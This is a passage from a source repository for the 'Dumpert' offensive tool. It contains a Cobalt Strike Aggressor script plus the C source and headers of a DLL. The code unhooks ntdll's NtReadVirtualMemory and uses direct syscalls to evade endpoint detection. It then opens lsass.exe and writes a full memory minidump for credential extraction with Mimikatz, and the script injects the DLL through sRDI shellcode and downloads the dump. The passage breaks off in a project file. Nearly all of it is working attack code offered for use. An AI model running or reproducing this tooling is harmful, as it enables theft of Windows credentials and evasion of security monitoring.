├── Dumpert-Aggressor └── Outflank-Dumpert.cna ├── Dumpert-DLL ├── Outflank-Dumpert-DLL.sln └── Outflank-Dumpert-DLL │ ├── Dumpert.c │ ├── Dumpert.h │ ├── Outflank-Dumpert-DLL.vcxproj │ ├── Outflank-Dumpert-DLL.vcxproj.filters │ ├── Outflank-Dumpert-DLL.vcxproj.user │ └── Syscalls.asm ├── Dumpert ├── Outflank-Dumpert.sln └── Outflank-Dumpert │ ├── Dumpert.c │ ├── Dumpert.h │ ├── Outflank-Dumpert.vcxproj │ ├── Outflank-Dumpert.vcxproj.filters │ ├── Outflank-Dumpert.vcxproj.user │ └── Syscalls.asm └── README.md /Dumpert-Aggressor/Outflank-Dumpert.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | #injects a sRDI shellcode (shellcode Reflective DLL Injection) in current process and creates a minidump of lsass process. 5 | #see https://github.com/monoxgas/sRDI 6 | 7 | #register help 8 | beacon_command_register("dumpert", "Create a minidump of lsass process", 9 | "Synopsis: dumpert\n\n" . 10 | "Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" . 11 | "Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\""); 12 | 13 | alias dumpert { 14 | $bid = $1; 15 | $curr_pid = beacon_info($bid, "pid"); 16 | 17 | if (-isadmin $bid) { 18 | blog($bid, "Dumpert by Outflank"); 19 | if (-is64 $bid) { 20 | bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin")); 21 | blog($bid, "Waiting a few seconds for task to complete..."); 22 | bpause($bid, 10000); 23 | bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp"); 24 | return; 25 | } 26 | else{ 27 | berror($bid, "Dumpert is x64 only."); 28 | return; 29 | } 30 | } 31 | else{ 32 | berror($bid, "You need elevated privileges."); 33 | return; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert-DLL", "Outflank-Dumpert-DLL\Outflank-Dumpert-DLL.vcxproj", "{307088B9-2992-4DE7-A57D-9E657B1CE546}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.ActiveCfg = Debug|x64 17 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.Build.0 = Debug|x64 18 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.ActiveCfg = Debug|Win32 19 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.Build.0 = Debug|Win32 20 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.ActiveCfg = Release|x64 21 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.Build.0 = Release|x64 22 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.ActiveCfg = Release|Win32 23 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | #include "Dumpert.h" 9 | #include 10 | 11 | #pragma comment (lib, "Dbghelp.lib") 12 | 13 | 14 | BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { 15 | BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF}; 16 | 17 | if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { 18 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 19 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory10; 20 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory10; 21 | } 22 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) { 23 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 24 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1; 25 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1; 26 | } 27 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { 28 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 29 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory80; 30 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory80; 31 | } 32 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { 33 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 34 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory81; 35 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory81; 36 | } 37 | else { 38 | return FALSE; 39 | } 40 | 41 | LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall); 42 | 43 | LPVOID lpBaseAddress = lpProcAddress; 44 | ULONG OldProtection, NewProtection; 45 | SIZE_T uSize = 10; 46 | NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); 47 | if (status != STATUS_SUCCESS) { 48 | return FALSE; 49 | } 50 | 51 | status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL); 52 | if (status != STATUS_SUCCESS) { 53 | return FALSE; 54 | } 55 | 56 | status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection); 57 | if (status != STATUS_SUCCESS) { 58 | return FALSE; 59 | } 60 | 61 | return TRUE; 62 | } 63 | 64 | BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) { 65 | pWinVerInfo->hTargetPID = NULL; 66 | 67 | if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { 68 | ZwQuerySystemInformation = &ZwQuerySystemInformation10; 69 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory10; 70 | NtFreeVirtualMemory = &NtFreeVirtualMemory10; 71 | } 72 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) { 73 | ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1; 74 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1; 75 | NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1; 76 | } 77 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { 78 | ZwQuerySystemInformation = &ZwQuerySystemInformation80; 79 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory80; 80 | NtFreeVirtualMemory = &NtFreeVirtualMemory80; 81 | } 82 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { 83 | ZwQuerySystemInformation = &ZwQuerySystemInformation81; 84 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory81; 85 | NtFreeVirtualMemory = &NtFreeVirtualMemory81; 86 | } 87 | else { 88 | return FALSE; 89 | } 90 | 91 | ULONG uReturnLength = 0; 92 | NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength); 93 | if (!status == 0xc0000004) { 94 | return FALSE; 95 | } 96 | 97 | LPVOID pBuffer = NULL; 98 | SIZE_T uSize = uReturnLength; 99 | status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE); 100 | if (status != 0) { 101 | return FALSE; 102 | } 103 | 104 | status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength); 105 | if (status != 0) { 106 | return FALSE; 107 | } 108 | 109 | _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString) 110 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString"); 111 | if (RtlEqualUnicodeString == NULL) { 112 | return FALSE; 113 | } 114 | 115 | PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer; 116 | do { 117 | if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) { 118 | pWinVerInfo->hTargetPID = pProcInfo->ProcessId; 119 | break; 120 | } 121 | pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta); 122 | 123 | } while (pProcInfo); 124 | 125 | status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE); 126 | 127 | if (pWinVerInfo->hTargetPID == NULL) { 128 | return FALSE; 129 | } 130 | 131 | return TRUE; 132 | } 133 | 134 | BOOL IsElevated() { 135 | BOOL fRet = FALSE; 136 | HANDLE hToken = NULL; 137 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 138 | TOKEN_ELEVATION Elevation = { 0 }; 139 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 140 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 141 | fRet = Elevation.TokenIsElevated; 142 | } 143 | } 144 | if (hToken) { 145 | CloseHandle(hToken); 146 | } 147 | return fRet; 148 | } 149 | 150 | BOOL SetDebugPrivilege() { 151 | HANDLE hToken = NULL; 152 | TOKEN_PRIVILEGES TokenPrivileges = { 0 }; 153 | 154 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { 155 | return FALSE; 156 | } 157 | 158 | TokenPrivileges.PrivilegeCount = 1; 159 | TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0; 160 | 161 | LPWSTR lpwPriv = L"SeDebugPrivilege"; 162 | if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) { 163 | CloseHandle(hToken); 164 | return FALSE; 165 | } 166 | 167 | if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) { 168 | CloseHandle(hToken); 169 | return FALSE; 170 | } 171 | 172 | CloseHandle(hToken); 173 | return TRUE; 174 | } 175 | 176 | __declspec(dllexport) void __cdecl Dump() { 177 | 178 | if (sizeof(LPVOID) != 8) { 179 | exit(1); 180 | } 181 | 182 | if (!IsElevated()) { 183 | exit(1); 184 | } 185 | 186 | SetDebugPrivilege(); 187 | 188 | PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO)); 189 | 190 | // First set OS Version/Architecture specific values 191 | OSVERSIONINFOEXW osInfo; 192 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 193 | 194 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 195 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 196 | if (RtlGetVersion == NULL) { 197 | exit(1); 198 | } 199 | 200 | RtlGetVersion(&osInfo); 201 | swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 202 | pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber; 203 | 204 | // Now create os/build specific syscall function pointers. 205 | if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { 206 | ZwOpenProcess = &ZwOpenProcess10; 207 | ZwClose = &ZwClose10; 208 | NtCreateFile = &NtCreateFile10; 209 | pWinVerInfo->SystemCall = 0x3F; 210 | } 211 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) { 212 | ZwOpenProcess = &ZwOpenProcess7SP1; 213 | ZwClose = &ZwClose7SP1; 214 | NtCreateFile = &NtCreateFile7SP1; 215 | pWinVerInfo->SystemCall = 0x3C; 216 | } 217 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { 218 | ZwOpenProcess = &ZwOpenProcess80; 219 | ZwClose = &ZwClose80; 220 | NtCreateFile = &NtCreateFile80; 221 | pWinVerInfo->SystemCall = 0x3D; 222 | } 223 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { 224 | ZwOpenProcess = &ZwOpenProcess81; 225 | ZwClose = &ZwClose81; 226 | NtCreateFile = &NtCreateFile81; 227 | pWinVerInfo->SystemCall = 0x3E; 228 | } 229 | else { 230 | exit(1); 231 | } 232 | 233 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) 234 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString"); 235 | if (RtlInitUnicodeString == NULL) { 236 | exit(1); 237 | } 238 | 239 | RtlInitUnicodeString(&pWinVerInfo->ProcName, L"lsass.exe"); 240 | 241 | if (!GetPID(pWinVerInfo)) { 242 | exit(1); 243 | } 244 | 245 | pWinVerInfo->lpApiCall = "NtReadVirtualMemory"; 246 | 247 | if (!Unhook_NativeAPI(pWinVerInfo)) { 248 | exit(1); 249 | } 250 | 251 | HANDLE hProcess = NULL; 252 | OBJECT_ATTRIBUTES ObjectAttributes; 253 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); 254 | CLIENT_ID uPid = { 0 }; 255 | 256 | uPid.UniqueProcess = pWinVerInfo->hTargetPID; 257 | uPid.UniqueThread = (HANDLE)0; 258 | 259 | NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid); 260 | if (hProcess == NULL) { 261 | exit(1); 262 | } 263 | 264 | WCHAR chDmpFile[MAX_PATH] = L"\\??\\"; 265 | WCHAR chWinPath[MAX_PATH]; 266 | GetWindowsDirectory(chWinPath, MAX_PATH); 267 | wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath); 268 | wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp"); 269 | 270 | UNICODE_STRING uFileName; 271 | RtlInitUnicodeString(&uFileName, chDmpFile); 272 | 273 | HANDLE hDmpFile = NULL; 274 | IO_STATUS_BLOCK IoStatusBlock; 275 | ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock)); 276 | OBJECT_ATTRIBUTES FileObjectAttributes; 277 | InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL); 278 | 279 | // Open input file for writing, overwrite existing file. 280 | status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0, 281 | FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 282 | 283 | if (hDmpFile == INVALID_HANDLE_VALUE) { 284 | ZwClose(hProcess); 285 | exit(1); 286 | } 287 | 288 | DWORD dwTargetPID = GetProcessId(hProcess); 289 | BOOL Success = MiniDumpWriteDump(hProcess, 290 | dwTargetPID, 291 | hDmpFile, 292 | MiniDumpWithFullMemory, 293 | NULL, 294 | NULL, 295 | NULL); 296 | 297 | ZwClose(hDmpFile); 298 | ZwClose(hProcess); 299 | 300 | return; 301 | } 302 | 303 | BOOL APIENTRY DllMain( 304 | HINSTANCE hinstDLL, 305 | DWORD fdwReason, 306 | LPVOID lpReserved) 307 | { 308 | 309 | switch (fdwReason) 310 | { 311 | case DLL_PROCESS_ATTACH: 312 | Dump(); 313 | break; 314 | case DLL_THREAD_ATTACH: 315 | break; 316 | case DLL_THREAD_DETACH: 317 | break; 318 | case DLL_PROCESS_DETACH: 319 | break; 320 | } 321 | return TRUE; 322 | } 323 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define STATUS_SUCCESS 0 6 | #define OBJ_CASE_INSENSITIVE 0x00000040L 7 | #define FILE_OVERWRITE_IF 0x00000005 8 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 9 | typedef LONG KPRIORITY; 10 | 11 | #define InitializeObjectAttributes( i, o, a, r, s ) { \ 12 | (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 13 | (i)->RootDirectory = r; \ 14 | (i)->Attributes = a; \ 15 | (i)->ObjectName = o; \ 16 | (i)->SecurityDescriptor = s; \ 17 | (i)->SecurityQualityOfService = NULL; \ 18 | } 19 | 20 | typedef struct _UNICODE_STRING { 21 | USHORT Length; 22 | USHORT MaximumLength; 23 | PWSTR Buffer; 24 | } UNICODE_STRING, *PUNICODE_STRING; 25 | 26 | typedef const UNICODE_STRING* PCUNICODE_STRING; 27 | 28 | typedef struct _WIN_VER_INFO { 29 | WCHAR chOSMajorMinor[8]; 30 | DWORD dwBuildNumber; 31 | UNICODE_STRING ProcName; 32 | HANDLE hTargetPID; 33 | LPCSTR lpApiCall; 34 | INT SystemCall; 35 | } WIN_VER_INFO, *PWIN_VER_INFO; 36 | 37 | typedef struct _OBJECT_ATTRIBUTES { 38 | ULONG Length; 39 | HANDLE RootDirectory; 40 | PUNICODE_STRING ObjectName; 41 | ULONG Attributes; 42 | PVOID SecurityDescriptor; 43 | PVOID SecurityQualityOfService; 44 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 45 | 46 | typedef struct _CLIENT_ID { 47 | HANDLE UniqueProcess; 48 | HANDLE UniqueThread; 49 | } CLIENT_ID, *PCLIENT_ID; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS { 52 | SystemBasicInformation, 53 | SystemProcessorInformation, 54 | SystemPerformanceInformation, 55 | SystemTimeOfDayInformation, 56 | SystemPathInformation, 57 | SystemProcessInformation, 58 | SystemCallCountInformation, 59 | SystemDeviceInformation, 60 | SystemProcessorPerformanceInformation, 61 | SystemFlagsInformation, 62 | SystemCallTimeInformation, 63 | SystemModuleInformation 64 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 65 | 66 | typedef struct _SYSTEM_PROCESSES { 67 | ULONG NextEntryDelta; 68 | ULONG ThreadCount; 69 | ULONG Reserved1[6]; 70 | LARGE_INTEGER CreateTime; 71 | LARGE_INTEGER UserTime; 72 | LARGE_INTEGER KernelTime; 73 | UNICODE_STRING ProcessName; 74 | KPRIORITY BasePriority; 75 | HANDLE ProcessId; 76 | HANDLE InheritedFromProcessId; 77 | } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 78 | 79 | typedef struct _IO_STATUS_BLOCK 80 | { 81 | union 82 | { 83 | LONG Status; 84 | PVOID Pointer; 85 | }; 86 | ULONG Information; 87 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 88 | 89 | 90 | // Windows 7 SP1 / Server 2008 R2 specific Syscalls 91 | EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 92 | EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 93 | EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 94 | EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle); 95 | EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 96 | EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 97 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 98 | EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 99 | 100 | // Windows 8 / Server 2012 specific Syscalls 101 | EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 102 | EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 103 | EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 104 | EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle); 105 | EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 106 | EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 107 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 108 | EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 109 | 110 | 111 | // Windows 8.1 / Server 2012 R2 specific Syscalls 112 | EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 113 | EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 114 | EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 115 | EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle); 116 | EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 117 | EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 118 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 119 | EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 120 | 121 | 122 | // Windows 10 / Server 2016 specific Syscalls 123 | EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 124 | EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 125 | EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 126 | EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle); 127 | EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 128 | EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 129 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 130 | EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 131 | 132 | NTSTATUS(*NtAllocateVirtualMemory)( 133 | HANDLE ProcessHandle, 134 | PVOID *BaseAddress, 135 | ULONG_PTR ZeroBits, 136 | PSIZE_T RegionSize, 137 | ULONG AllocationType, 138 | ULONG Protect 139 | ); 140 | 141 | NTSTATUS(*NtFreeVirtualMemory)( 142 | HANDLE ProcessHandle, 143 | PVOID *BaseAddress, 144 | IN OUT PSIZE_T RegionSize, 145 | ULONG FreeType 146 | ); 147 | 148 | NTSTATUS(*ZwOpenProcess)( 149 | PHANDLE ProcessHandle, 150 | ACCESS_MASK DesiredAccess, 151 | POBJECT_ATTRIBUTES ObjectAttributes, 152 | PCLIENT_ID ClientId 153 | ); 154 | 155 | NTSTATUS(WINAPI *ZwQuerySystemInformation)( 156 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 157 | PVOID SystemInformation, 158 | ULONG SystemInformationLength, 159 | PULONG ReturnLength 160 | ); 161 | 162 | NTSTATUS(*ZwWriteVirtualMemory)( 163 | HANDLE hProcess, 164 | PVOID lpBaseAddress, 165 | PVOID lpBuffer, 166 | SIZE_T NumberOfBytesToRead, 167 | PSIZE_T NumberOfBytesRead 168 | ); 169 | 170 | NTSTATUS(*ZwProtectVirtualMemory)( 171 | IN HANDLE ProcessHandle, 172 | IN PVOID* BaseAddress, 173 | IN SIZE_T* NumberOfBytesToProtect, 174 | IN ULONG NewAccessProtection, 175 | OUT PULONG OldAccessProtection 176 | ); 177 | 178 | NTSTATUS(*NtCreateFile)( 179 | PHANDLE FileHandle, 180 | ACCESS_MASK DesiredAccess, 181 | POBJECT_ATTRIBUTES ObjectAttributes, 182 | PIO_STATUS_BLOCK IoStatusBlock, 183 | PLARGE_INTEGER AllocationSize, 184 | ULONG FileAttributes, 185 | ULONG ShareAccess, 186 | ULONG CreateDisposition, 187 | ULONG CreateOptions, 188 | PVOID EaBuffer, 189 | ULONG EaLength 190 | ); 191 | 192 | NTSTATUS(*ZwClose)( 193 | IN HANDLE KeyHandle 194 | ); 195 | 196 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 197 | LPOSVERSIONINFOEXW lpVersionInformation 198 | ); 199 | 200 | typedef void (WINAPI* _RtlInitUnicodeString)( 201 | PUNICODE_STRING DestinationString, 202 | PCWSTR SourceString 203 | ); 204 | 205 | typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)( 206 | PUNICODE_STRING String1, 207 | PCUNICODE_STRING String2, 208 | BOOLEAN CaseInSensitive 209 | ); 210 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {307088B9-2992-4DE7-A57D-9E657B1CE546} 23 | OutflankDumpertDLL 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | MultiByte 32 | 33 | 34 | Application 35 | 